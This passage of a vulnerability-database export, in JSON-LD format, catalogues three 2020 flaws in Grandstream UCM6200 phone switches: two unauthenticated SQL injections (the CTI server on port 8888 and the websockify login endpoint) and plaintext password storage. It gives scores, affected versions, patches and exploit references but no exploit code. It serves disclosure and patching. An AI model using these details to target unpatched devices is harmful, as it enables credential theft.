                "id": "JVNDB-2020-003471",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-24401",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202003-1716",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-24401"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1716"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5726"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the CTI server on port 8888. A remote unauthenticated attacker can invoke the challenge action with a crafted username and discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-5726"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-24401"
          }
        ],
        "trust": 2.16
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-5726",
            "trust": 3.0
          },
          {
            "db": "TENABLE",
            "id": "TRA-2020-17",
            "trust": 2.4
          },
          {
            "db": "PACKETSTORM",
            "id": "156977",
            "trust": 1.6
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-24401",
            "trust": 0.6
          },
          {
            "db": "EXPLOIT-DB",
            "id": "48270",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1716",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-24401"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1716"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5726"
          }
        ]
      },
      "id": "VAR-202003-1439",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-24401"
          }
        ],
        "trust": 1.45714287
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-24401"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:25:34.336000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.grandstream.com/"
          },
          {
            "title": "Patch for Grandstream UCM6200 SQL injection vulnerability (CNVD-2020-24401)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/215057"
          },
          {
            "title": "Grandstream UCM6200 SQL Repair measures for injecting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=113111"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-24401"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1716"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5726"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://www.tenable.com/security/research/tra-2020-17"
          },
          {
            "trust": 1.6,
            "url": "http://packetstormsecurity.com/files/156977/grandstream-ucm6200-series-cti-interface-sql-injection.html"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-5726"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5726"
          },
          {
            "trust": 0.6,
            "url": "https://www.exploit-db.com/exploits/48270"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1716"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5726"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-24401"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1716"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5726"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-23T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-24401"
          },
          {
            "date": "2020-04-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          },
          {
            "date": "2020-03-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202003-1716"
          },
          {
            "date": "2020-03-30T20:15:20.180000",
            "db": "NVD",
            "id": "CVE-2020-5726"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-23T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-24401"
          },
          {
            "date": "2020-04-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          },
          {
            "date": "2020-04-01T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202003-1716"
          },
          {
            "date": "2024-11-21T05:34:29.507000",
            "db": "NVD",
            "id": "CVE-2020-5726"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1716"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Grandstream UCM6200 In the series  SQL Injection vulnerabilities",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1716"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202003-1438

    Vulnerability from variot - Updated: 2024-11-23 22:25

    The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the HTTP server's websockify endpoint. A remote unauthenticated attacker can invoke the login action with a crafted username and, through the use of timing attacks, can discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. The vulnerability stems from the database-backed application failing to validate externally supplied input used in SQL statements. Attackers can use this vulnerability to execute illegal SQL commands.

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202003-1438",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ucm6204",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6208",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6202",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6202",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6204",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6208",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6200",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5725"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6202_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6204_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6208_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Jacob Baines",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2020-5725",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CVE-2020-5725",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Medium",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 4.3,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003470",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "HIGH",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.4,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 4.9,
                "id": "CNVD-2020-20682",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:H/Au:N/C:C/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.9,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.2,
                "id": "CVE-2020-5725",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "High",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 5.9,
                "baseSeverity": "Medium",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003470",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-5725",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "JVNDB-2020-003470",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-20682",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202003-1715",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5725"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the HTTP server\u0027s websockify endpoint. A remote unauthenticated attacker can invoke the login action with a crafted username and, through the use of timing attacks, can discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. The vulnerability stems from the lack of verification of external input SQL statements by database-based applications. Attackers can use this vulnerability to execute illegal SQL commands",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-5725"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          }
        ],
        "trust": 2.16
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-5725",
            "trust": 3.0
          },
          {
            "db": "TENABLE",
            "id": "TRA-2020-17",
            "trust": 2.4
          },
          {
            "db": "PACKETSTORM",
            "id": "156976",
            "trust": 1.6
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003470",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-20682",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1715",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5725"
          }
        ]
      },
      "id": "VAR-202003-1438",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          }
        ],
        "trust": 1.45714287
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:25:34.309000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.grandstream.com/"
          },
          {
            "title": "Patch for Grandstream UCM6200 SQL injection vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/211861"
          },
          {
            "title": "Grandstream UCM6200 SQL Repair measures for injecting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=113110"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5725"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.6,
            "url": "https://www.tenable.com/security/research/tra-2020-17"
          },
          {
            "trust": 1.6,
            "url": "http://packetstormsecurity.com/files/156976/grandstream-ucm6200-series-websocket-1.0.20.20-sql-injection.html"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-5725"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5725"
          },
          {
            "trust": 0.8,
            "url": "https://jp.tenable.com/security/research/tra-2020-17?tns_redirect=true"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5725"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5725"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-03-31T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          },
          {
            "date": "2020-04-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          },
          {
            "date": "2020-03-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          },
          {
            "date": "2020-03-30T20:15:20.133000",
            "db": "NVD",
            "id": "CVE-2020-5725"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-01T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          },
          {
            "date": "2020-04-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          },
          {
            "date": "2020-04-01T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          },
          {
            "date": "2024-11-21T05:34:29.400000",
            "db": "NVD",
            "id": "CVE-2020-5725"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Grandstream UCM6200 SQL injection vulnerability",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          }
        ],
        "trust": 1.2
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202003-1436

    Vulnerability from variot - Updated: 2024-11-23 22:25

    The UCM6200 series 1.0.20.22 and below stores unencrypted user passwords in an SQLite database. This could allow an attacker to retrieve all passwords and possibly gain elevated privileges. The UCM6200 series contains a vulnerability in the plaintext storage of important information. Information may be obtained or tampered with, and service operation may be interrupted (DoS). Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream.

    Grandstream UCM6200 series 1.0.20.22 and previous versions have security vulnerabilities.

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202003-1436",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ucm6204",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6208",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6202",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6202",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6204",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6208",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6200",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "grandstream",
            "version": "\u003c=1.0.20.22"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20679"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5723"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
